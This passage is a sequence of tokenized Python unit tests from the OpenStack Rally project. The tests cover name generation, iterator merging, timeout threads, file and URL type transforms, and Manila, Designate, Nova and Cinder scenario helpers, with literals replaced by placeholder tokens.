"<STR_LIT>" , <EOL> exact = False ) ) <EOL> obj . name_matches_object . assert_called_once_with ( name , task_id = "<STR_LIT>" , <EOL> exact = False ) <EOL> def test_name_matches_object_identical_list ( self ) : <EOL> class One ( utils . RandomNameGeneratorMixin ) : <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Two ( utils . RandomNameGeneratorMixin ) : <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> name = "<STR_LIT:foo>" <EOL> self . assertFalse ( utils . name_matches_object ( name , One , Two ) ) <EOL> self . assertItemsEqual ( <EOL> One . name_matches_object . call_args_list + <EOL> Two . name_matches_object . call_args_list , <EOL> [ mock . call ( name ) ] ) <EOL> def test_name_matches_object_differing_list ( self ) : <EOL> class One ( utils . 
RandomNameGeneratorMixin ) : <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Two ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Three ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_ALLOWED_CHARACTERS = "<STR_LIT>" <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Four ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> RESOURCE_NAME_ALLOWED_CHARACTERS = "<STR_LIT>" <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> classes = ( One , Two , Three , Four ) <EOL> name = "<STR_LIT:foo>" <EOL> self . assertFalse ( utils . name_matches_object ( name , * classes ) ) <EOL> for cls in classes : <EOL> cls . name_matches_object . assert_called_once_with ( name ) <EOL> def test_cls_name_matches_object_identity ( self ) : <EOL> generator = utils . RandomNameGeneratorMixin ( ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . assertTrue ( generator . name_matches_object ( <EOL> generator . generate_random_name ( ) ) ) <EOL> self . assertTrue ( utils . RandomNameGeneratorMixin . name_matches_object ( <EOL> generator . generate_random_name ( ) ) ) <EOL> def test_name_matches_object_identity ( self ) : <EOL> generator = utils . RandomNameGeneratorMixin ( ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . assertTrue ( utils . name_matches_object ( <EOL> generator . generate_random_name ( ) , generator ) ) <EOL> self . assertTrue ( utils . name_matches_object ( <EOL> generator . generate_random_name ( ) , utils . RandomNameGeneratorMixin ) ) <EOL> def test_consistent_task_id_part ( self ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> generator = FakeNameGenerator ( ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> names = [ generator . 
generate_random_name ( ) for i in range ( <NUM_LIT:100> ) ] <EOL> task_id_parts = set ( [ n . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] for n in names ] ) <EOL> self . assertEqual ( len ( task_id_parts ) , <NUM_LIT:1> ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> names = [ generator . generate_random_name ( ) for i in range ( <NUM_LIT:100> ) ] <EOL> task_id_parts = set ( [ n . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] for n in names ] ) <EOL> self . assertEqual ( len ( task_id_parts ) , <NUM_LIT:1> ) <EOL> @ ddt . ddt <EOL> class MergeTestCase ( test . TestCase ) : <EOL> @ ddt . data ( <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ ] ] , <EOL> "<STR_LIT>" 
: [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ ] , [ ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ ] , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ 
<NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] } , <EOL> { "<STR_LIT>" : [ [ ] , [ ] , [ ] , [ ] ] , <EOL> "<STR_LIT>" : [ ] } <EOL> ) <EOL> @ ddt . unpack <EOL> def test_merge ( self , sources , expected_output ) : <EOL> in_iters = [ iter ( src ) for src in sources ] <EOL> out = list ( utils . merge ( <NUM_LIT:10> , * in_iters ) ) <EOL> self . assertEqual ( out , expected_output ) <EOL> class TimeoutThreadTestCase ( test . TestCase ) : <EOL> def test_timeout_thread ( self ) : <EOL> """<STR_LIT>""" <EOL> queue = Queue . Queue ( ) <EOL> killer_thread = threading . Thread ( <EOL> target = utils . timeout_thread , <EOL> args = ( queue , ) , <EOL> ) <EOL> test_thread = threading . Thread ( <EOL> target = utils . interruptable_sleep , <EOL> args = ( <NUM_LIT:30> , <NUM_LIT> ) , <EOL> ) <EOL> test_thread . start ( ) <EOL> start_time = time . time ( ) <EOL> queue . put ( ( test_thread . ident , start_time + <NUM_LIT:1> ) ) <EOL> killer_thread . start ( ) <EOL> test_thread . join ( ) <EOL> end_time = time . time ( ) <EOL> queue . put ( ( None , None ) ) <EOL> killer_thread . join ( ) <EOL> time_elapsed = end_time - start_time <EOL> self . assertTrue ( time_elapsed < <NUM_LIT:11> , <EOL> "<STR_LIT>" % time_elapsed ) </s>
<s> import mock <EOL> from rally import exceptions <EOL> from rally . plugins . common import types <EOL> from tests . unit import test <EOL> class PathOrUrlTestCase ( test . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_transform_file ( self , mock_requests_head , mock_isfile ) : <EOL> mock_isfile . return_value = True <EOL> path = types . PathOrUrl . transform ( None , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , path ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_transform_bogus ( self , mock_requests_head , mock_isfile ) : <EOL> mock_isfile . return_value = False <EOL> mock_requests_head . return_value = mock . Mock ( status_code = <NUM_LIT> ) <EOL> self . assertRaises ( exceptions . InvalidScenarioArgument , <EOL> types . PathOrUrl . transform , <EOL> None , "<STR_LIT>" ) <EOL> mock_requests_head . assert_called_once_with ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_transform_url ( self , mock_requests_head , mock_isfile ) : <EOL> mock_isfile . return_value = False <EOL> mock_requests_head . return_value = mock . Mock ( status_code = <NUM_LIT:200> ) <EOL> path = types . PathOrUrl . transform ( None , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , path ) <EOL> class FileTypeTestCase ( test . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" , <EOL> side_effect = mock . mock_open ( read_data = "<STR_LIT>" ) , <EOL> create = True ) <EOL> def test_transform_by_path ( self , mock_open ) : <EOL> resource_config = "<STR_LIT>" <EOL> file_context = types . FileType . transform ( <EOL> clients = None , resource_config = resource_config ) <EOL> self . assertEqual ( file_context , "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" , side_effect = IOError , create = True ) <EOL> def test_transform_by_path_no_match ( self , mock_open ) : <EOL> resource_config = "<STR_LIT>" <EOL> self . 
assertRaises ( IOError , <EOL> types . FileType . transform , <EOL> clients = None , <EOL> resource_config = resource_config ) <EOL> class FileTypeDictTestCase ( test . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" , <EOL> side_effect = mock . mock_open ( read_data = "<STR_LIT>" ) , <EOL> create = True ) <EOL> def test_transform_by_path ( self , mock_open ) : <EOL> resource_config = [ "<STR_LIT>" ] <EOL> file_context = types . FileTypeDict . transform ( <EOL> clients = None , <EOL> resource_config = resource_config ) <EOL> self . assertEqual ( file_context , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> @ mock . patch ( "<STR_LIT>" , side_effect = IOError , create = True ) <EOL> def test_transform_by_path_no_match ( self , mock_open ) : <EOL> resource_config = [ "<STR_LIT>" ] <EOL> self . assertRaises ( IOError , <EOL> types . FileTypeDict . transform , <EOL> clients = None , <EOL> resource_config = resource_config ) </s>
<s> import mock <EOL> from rally . plugins . openstack . context . quotas import manila_quotas <EOL> from tests . unit import test <EOL> CLIENTS_CLASS = ( <EOL> "<STR_LIT>" ) <EOL> class ManilaQuotasTestCase ( test . TestCase ) : <EOL> @ mock . patch ( CLIENTS_CLASS ) <EOL> def test_update ( self , mock_clients ) : <EOL> instance = manila_quotas . ManilaQuotas ( mock_clients ) <EOL> tenant_id = mock . MagicMock ( ) <EOL> quotas_values = { <EOL> "<STR_LIT>" : <NUM_LIT:10> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:7> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } <EOL> instance . update ( tenant_id , ** quotas_values ) <EOL> mock_clients . manila . return_value . quotas . update . assert_called_once_with ( <EOL> tenant_id , ** quotas_values ) <EOL> @ mock . patch ( CLIENTS_CLASS ) <EOL> def test_delete ( self , mock_clients ) : <EOL> instance = manila_quotas . ManilaQuotas ( mock_clients ) <EOL> tenant_id = mock . MagicMock ( ) <EOL> instance . delete ( tenant_id ) <EOL> mock_clients . manila . return_value . quotas . delete . assert_called_once_with ( <EOL> tenant_id ) </s>
<s> import ddt <EOL> import mock <EOL> from rally . plugins . openstack . scenarios . designate import utils <EOL> from tests . unit import test <EOL> DESIGNATE_UTILS = "<STR_LIT>" <EOL> @ ddt . ddt <EOL> class DesignateScenarioTestCase ( test . ScenarioTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( DesignateScenarioTestCase , self ) . setUp ( ) <EOL> self . domain = mock . Mock ( ) <EOL> self . zone = mock . Mock ( ) <EOL> self . server = mock . Mock ( ) <EOL> self . client = self . clients ( "<STR_LIT>" , version = "<STR_LIT:2>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:email>" : "<STR_LIT>" } ) <EOL> def test_create_domain ( self , domain_data ) : <EOL> random_name = "<STR_LIT:foo>" <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> self . clients ( "<STR_LIT>" ) . domains . create . return_value = self . domain <EOL> expected = { "<STR_LIT:email>" : "<STR_LIT>" } <EOL> expected . update ( domain_data ) <EOL> expected [ "<STR_LIT:name>" ] = "<STR_LIT>" % random_name <EOL> domain = scenario . _create_domain ( domain_data ) <EOL> self . clients ( "<STR_LIT>" ) . domains . create . assert_called_once_with ( <EOL> expected ) <EOL> self . assertEqual ( self . domain , domain ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_domains ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_domains_list = scenario . _list_domains ( ) <EOL> self . assertEqual ( self . clients ( "<STR_LIT>" ) . domains . list . return_value , <EOL> return_domains_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_delete_domain ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> domain = scenario . _create_domain ( ) <EOL> scenario . 
_delete_domain ( domain [ "<STR_LIT:id>" ] ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_update_domain ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> domain = scenario . _create_domain ( ) <EOL> self . clients ( "<STR_LIT>" ) . domains . update . return_value = self . domain <EOL> updated_domain = scenario . _update_domain ( domain ) <EOL> self . clients ( "<STR_LIT>" ) . domains . update . assert_called_once_with ( <EOL> domain ) <EOL> self . assertEqual ( self . domain , updated_domain ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:data>" : "<STR_LIT:127.0.0.1>" } ) <EOL> def test_create_record ( self , record_data ) : <EOL> random_name = "<STR_LIT:foo>" <EOL> domain_name = "<STR_LIT>" <EOL> domain = { "<STR_LIT:name>" : domain_name , "<STR_LIT:id>" : "<STR_LIT>" } <EOL> record_name = "<STR_LIT>" % ( random_name , domain_name ) <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> expected = { "<STR_LIT:type>" : "<STR_LIT:A>" , "<STR_LIT:data>" : "<STR_LIT>" } <EOL> expected . update ( record_data ) <EOL> expected [ "<STR_LIT:name>" ] = record_name <EOL> scenario . _create_record ( domain , record = record_data ) <EOL> self . clients ( "<STR_LIT>" ) . records . create . assert_called_once_with ( <EOL> domain [ "<STR_LIT:id>" ] , expected ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_records ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_records_list = scenario . _list_records ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . clients ( "<STR_LIT>" ) . records . list . return_value , <EOL> return_records_list ) <EOL> self . 
_test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_delete_record ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> domain_id = mock . Mock ( ) <EOL> record_id = mock . Mock ( ) <EOL> scenario . _delete_record ( domain_id , record_id ) <EOL> self . clients ( "<STR_LIT>" ) . records . delete . assert_called_once_with ( <EOL> domain_id , record_id ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . clients ( "<STR_LIT>" ) . records . delete . reset_mock ( ) <EOL> scenario . _delete_record ( domain_id , record_id , atomic_action = False ) <EOL> self . clients ( "<STR_LIT>" ) . records . delete . assert_called_once_with ( <EOL> domain_id , record_id ) <EOL> def test_create_server ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> random_name = "<STR_LIT:foo>" <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> explicit_name = "<STR_LIT>" <EOL> self . admin_clients ( <EOL> "<STR_LIT>" ) . servers . create . return_value = self . server <EOL> server = scenario . _create_server ( ) <EOL> self . admin_clients ( "<STR_LIT>" ) . servers . create . assert_called_once_with ( <EOL> { "<STR_LIT:name>" : "<STR_LIT>" % random_name } ) <EOL> self . assertEqual ( self . server , server ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . admin_clients ( "<STR_LIT>" ) . servers . create . reset_mock ( ) <EOL> data = { "<STR_LIT:name>" : explicit_name } <EOL> server = scenario . _create_server ( data ) <EOL> self . admin_clients ( <EOL> "<STR_LIT>" ) . servers . create . assert_called_once_with ( data ) <EOL> self . assertEqual ( self . server , server ) <EOL> def test_delete_server ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . 
_delete_server ( "<STR_LIT>" ) <EOL> self . admin_clients ( "<STR_LIT>" ) . servers . delete . assert_called_once_with ( <EOL> "<STR_LIT>" ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:email>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> { <EOL> "<STR_LIT:email>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } ) <EOL> def test_create_zone ( self , zone_data ) : <EOL> scenario = utils . DesignateScenario ( ) <EOL> random_name = "<STR_LIT:foo>" <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> self . client . zones . create . return_value = self . zone <EOL> expected = { <EOL> "<STR_LIT:email>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" % random_name , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> expected . update ( zone_data ) <EOL> zone = scenario . _create_zone ( ** zone_data ) <EOL> self . client . zones . create . assert_called_once_with ( <EOL> description = None , <EOL> ttl = None , <EOL> ** expected ) <EOL> self . assertEqual ( self . zone , zone ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_zones ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_zones_list = scenario . _list_zones ( ) <EOL> self . assertEqual ( self . client . zones . list . return_value , <EOL> return_zones_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_delete_zone ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> zone = scenario . _create_zone ( ) <EOL> scenario . _delete_zone ( zone [ "<STR_LIT:id>" ] ) <EOL> self . _test_atomic_action_timer ( scenario . 
atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list_recordsets ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> return_recordsets_list = scenario . _list_recordsets ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . client . recordsets . list . return_value , <EOL> return_recordsets_list ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT:data>" : "<STR_LIT:127.0.0.1>" } ) <EOL> def test_create_recordset ( self , recordset_data ) : <EOL> scenario = utils . DesignateScenario ( ) <EOL> random_name = "<STR_LIT:foo>" <EOL> zone_name = "<STR_LIT>" <EOL> random_recordset_name = "<STR_LIT>" % ( random_name , zone_name ) <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> scenario . generate_random_name = mock . Mock ( return_value = random_name ) <EOL> zone = { "<STR_LIT:name>" : zone_name , "<STR_LIT:id>" : "<STR_LIT>" } <EOL> scenario . _create_recordset ( zone ) <EOL> self . client . recordsets . create . assert_called_once_with ( <EOL> zone [ "<STR_LIT:id>" ] , <EOL> name = random_recordset_name , <EOL> type_ = "<STR_LIT:A>" , <EOL> records = [ "<STR_LIT>" ] ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . client . recordsets . create . reset_mock ( ) <EOL> recordset = { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> scenario . _create_recordset ( zone , recordset ) <EOL> self . client . recordsets . create . assert_called_once_with ( <EOL> zone [ "<STR_LIT:id>" ] , <EOL> name = "<STR_LIT>" , <EOL> type_ = "<STR_LIT>" , <EOL> records = [ "<STR_LIT>" ] ) <EOL> self . client . recordsets . create . reset_mock ( ) <EOL> scenario . _create_recordset ( zone , { "<STR_LIT:type>" : "<STR_LIT:A>" } ) <EOL> self . client . recordsets . create . 
assert_called_once_with ( <EOL> zone [ "<STR_LIT:id>" ] , <EOL> name = "<STR_LIT>" , <EOL> type_ = "<STR_LIT:A>" , <EOL> records = [ "<STR_LIT>" ] ) <EOL> def test_delete_recordset ( self ) : <EOL> scenario = utils . DesignateScenario ( context = self . context ) <EOL> zone_id = mock . Mock ( ) <EOL> recordset_id = mock . Mock ( ) <EOL> scenario . _delete_recordset ( zone_id , recordset_id ) <EOL> self . client . recordsets . delete . assert_called_once_with ( <EOL> zone_id , recordset_id ) <EOL> self . _test_atomic_action_timer ( scenario . atomic_actions ( ) , <EOL> "<STR_LIT>" ) <EOL> self . client . recordsets . delete . reset_mock ( ) <EOL> scenario . _delete_recordset ( zone_id , recordset_id , atomic_action = False ) <EOL> self . client . recordsets . delete . assert_called_once_with ( <EOL> zone_id , recordset_id ) </s>
<s> import mock <EOL> from rally . plugins . openstack . scenarios . nova import flavors <EOL> from tests . unit import test <EOL> class NovaFlavorsTestCase ( test . TestCase ) : <EOL> def test_list_flavors ( self ) : <EOL> scenario = flavors . NovaFlavors ( ) <EOL> scenario . _list_flavors = mock . Mock ( ) <EOL> scenario . list_flavors ( detailed = True , fakearg = "<STR_LIT>" ) <EOL> scenario . _list_flavors . assert_called_once_with ( True , fakearg = "<STR_LIT>" ) </s>
<s> import ddt <EOL> import mock <EOL> from rally import exceptions <EOL> from rally . plugins . openstack . wrappers import cinder as cinder_wrapper <EOL> from tests . unit import test <EOL> @ ddt . ddt <EOL> class CinderWrapperTestCase ( test . ScenarioTestCase ) : <EOL> @ ddt . data ( <EOL> { "<STR_LIT:version>" : "<STR_LIT:1>" , "<STR_LIT>" : cinder_wrapper . CinderV1Wrapper } , <EOL> { "<STR_LIT:version>" : "<STR_LIT:2>" , "<STR_LIT>" : cinder_wrapper . CinderV2Wrapper } <EOL> ) <EOL> @ ddt . unpack <EOL> def test_wrap ( self , version , expected_class ) : <EOL> client = mock . MagicMock ( ) <EOL> client . choose_version . return_value = version <EOL> self . assertIsInstance ( cinder_wrapper . wrap ( client , mock . Mock ( ) ) , <EOL> expected_class ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_wrap_wrong_version ( self , mock_log ) : <EOL> client = mock . MagicMock ( ) <EOL> client . choose_version . return_value = "<STR_LIT>" <EOL> self . assertRaises ( exceptions . InvalidArgumentsException , <EOL> cinder_wrapper . wrap , client , mock . Mock ( ) ) <EOL> self . assertTrue ( mock_log . warning . mock_called ) <EOL> class CinderV1WrapperTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CinderV1WrapperTestCase , self ) . setUp ( ) <EOL> self . client = mock . MagicMock ( ) <EOL> self . client . choose_version . return_value = "<STR_LIT:1>" <EOL> self . owner = mock . Mock ( ) <EOL> self . wrapped_client = cinder_wrapper . wrap ( self . client , self . owner ) <EOL> def test_create_volume ( self ) : <EOL> self . wrapped_client . create_volume ( <NUM_LIT:1> , display_name = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . create . assert_called_once_with ( <EOL> <NUM_LIT:1> , display_name = self . owner . generate_random_name . return_value ) <EOL> def test_update_volume ( self ) : <EOL> self . wrapped_client . 
update_volume ( "<STR_LIT>" , display_name = "<STR_LIT>" , <EOL> display_description = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . update . assert_called_once_with ( <EOL> "<STR_LIT>" , <EOL> display_name = self . owner . generate_random_name . return_value , <EOL> display_description = "<STR_LIT>" ) <EOL> def test_create_snapshot ( self ) : <EOL> self . wrapped_client . create_snapshot ( "<STR_LIT>" , <EOL> display_name = "<STR_LIT>" ) <EOL> ( self . client . return_value . volume_snapshots . create . <EOL> assert_called_once_with ( <EOL> "<STR_LIT>" , <EOL> display_name = self . owner . generate_random_name . return_value ) ) <EOL> class CinderV2WrapperTestCase ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CinderV2WrapperTestCase , self ) . setUp ( ) <EOL> self . client = mock . MagicMock ( ) <EOL> self . client . choose_version . return_value = "<STR_LIT:2>" <EOL> self . owner = mock . Mock ( ) <EOL> self . wrapped_client = cinder_wrapper . wrap ( self . client , self . owner ) <EOL> def test_create_volume ( self ) : <EOL> self . wrapped_client . create_volume ( <NUM_LIT:1> , name = 